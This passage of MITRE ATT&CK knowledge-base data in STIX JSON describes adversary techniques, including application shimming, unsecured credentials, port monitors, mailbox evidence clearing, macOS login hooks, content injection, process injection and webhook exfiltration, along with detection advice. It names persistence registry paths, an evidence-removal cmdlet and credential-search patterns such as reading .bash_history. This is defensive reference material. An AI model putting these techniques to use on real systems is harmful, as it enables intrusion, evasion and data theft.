system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Oleg Kolesnikov, Securonix", "Nick Carr, Mandiant", "David Lu, Tripwire", "Felipe Esp\u00f3sito, @Pr0teus", "Elastic", "Bartosz Jerzman", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\u201d.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Containers"], "x_mitre_version": "1.7", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "created": "2017-05-31T21:30:38.511Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036", "external_id": "T1036"}, {"source_name": "Twitter ItsReallyNick Masquerading Update", "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457"}, {"source_name": "Elastic Masquerade Ball", "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball"}, {"source_name": "LOLBAS Main Site", "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.", "url": "https://lolbas-project.github.io/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Application Shimming", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "created": "2020-01-24T14:56:24.231Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/011", "external_id": "T1546.011"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "FireEye Application Shimming", "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.", "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf"}, {"source_name": "Black Hat 2015 App Shim", "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-15T21:33:12.892Z", "name": "Unsecured Credentials", "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "created": "2020-02-04T12:47:23.631Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552", "external_id": "T1552"}, {"source_name": "Brining MimiKatz to Unix", "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-12T02:49:39.980Z", "name": "Port Monitors", "description": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) \n\nAlternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Stefan Kanthak", "Travis Smith, Tripwire", "Harun K\u00fc\u00dfner"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors, paying particular attention to changes in the \"Driver\" subkey. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["SYSTEM", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "created": "2020-01-24T19:46:27.750Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/010", "external_id": "T1547.010"}, {"source_name": "Bloxham", "description": "Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.", "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf"}, {"source_name": "AddMonitor", "description": "Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/dd183341"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Clear Mailbox Data", "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Liran Ravich, CardinalOps"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "Google Workspace"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "created": "2022-07-08T21:04:03.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/008", "external_id": "T1070.008"}, {"source_name": "Volexity SolarWinds", "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"}, {"source_name": "Cybereason Cobalt Kitty 2017", "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.", "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"}, {"source_name": "mailx man page", "description": "Michael Kerrisk. (2021, August 27). mailx(1p) \u2014 Linux manual page. Retrieved June 10, 2022.", "url": "https://man7.org/linux/man-pages/man1/mailx.1p.html"}, {"source_name": "ExchangePowerShell Module", "description": "Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.", "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes"}, {"source_name": "Microsoft OAuth Spam 2022", "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Login Hook", "description": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) \n\nAdversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", "created": "2020-01-10T16:01:15.995Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/002", "external_id": "T1037.002"}, {"source_name": "Login Scripts Apple Dev", "description": "Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.", "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html"}, {"source_name": "LoginWindowScripts Apple Dev", "description": "Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.", "url": "https://developer.apple.com/documentation/devicemanagement/loginwindowscripts"}, {"source_name": "Wardle Persistence Chapter", "description": "Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.", "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf"}, {"source_name": "S1 macOs Persistence", "description": "Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.", "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-01T02:28:45.147Z", "name": "Content Injection", "description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)\n\nAdversaries may inject content to victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "created": "2023-09-01T21:03:13.406Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1659", "external_id": "T1659"}, {"source_name": "EFF China GitHub Attack", "description": "Budington, B. (2015, April 2). China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack. Retrieved September 1, 2023.", "url": "https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack"}, {"source_name": "ESET MoustachedBouncer", "description": "Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 1, 2023.", "url": "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/"}, {"source_name": "Kaspersky Encyclopedia MiTM", "description": "Kaspersky IT Encyclopedia. (n.d.). Man-in-the-middle attack. Retrieved September 1, 2023.", "url": "https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/"}, {"source_name": "Kaspersky ManOnTheSide", "description": "Starikova, A. (2023, February 14). Man-on-the-side \u2013 peculiar attack. Retrieved September 1, 2023.", "url": "https://usa.kaspersky.com/blog/man-on-the-side/27854/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Process Injection", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Anastasios Pingios", "Christiaan Beek, @ChristiaanBeek", "Ryan Becwar"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "created": "2017-05-31T21:30:47.843Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055", "external_id": "T1055"}, {"source_name": "GNU Acct", "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", "url": "https://www.gnu.org/software/acct/"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "RHEL auditd", "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"}, {"source_name": "ArtOfMemoryForensics", "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017."}, {"source_name": "Microsoft Sysmon v6 May 2017", "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"}, {"source_name": "Chokepoint preload rootkits", "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-12T05:22:59.079Z", "name": "Exfiltration Over Webhook", "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Yossi Weizman, Microsoft Threat Intelligence", "Sunders Bruskin, Microsoft Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "SaaS", "Office 365", "Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "created": "2023-07-20T15:30:55.763Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1567/004", "external_id": "T1567.004"}, {"source_name": "Checkmarx Webhooks", "description": " Jossef Harush Kadouri. (2022, March 7). Webhook Party \u2014 Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.", "url": "https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191"}, {"source_name": "CyberArk Labs Discord", "description": "CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.", "url": "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord"}, {"source_name": "Discord Intro to Webhooks", "description": "D. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.", "url": "https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks"}, {"source_name": "Microsoft SQL Server", "description": "Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.", "url": "https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/"}, {"source_name": "Talos Discord Webhook Abuse", "description": "Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.", "url": "https://blog.talosintelligence.com/collab-app-abuse/"}, {"source_name": "Push Security SaaS Attacks Repository Webhooks", "description": "Push Security. (2023, July 31). Webhooks. 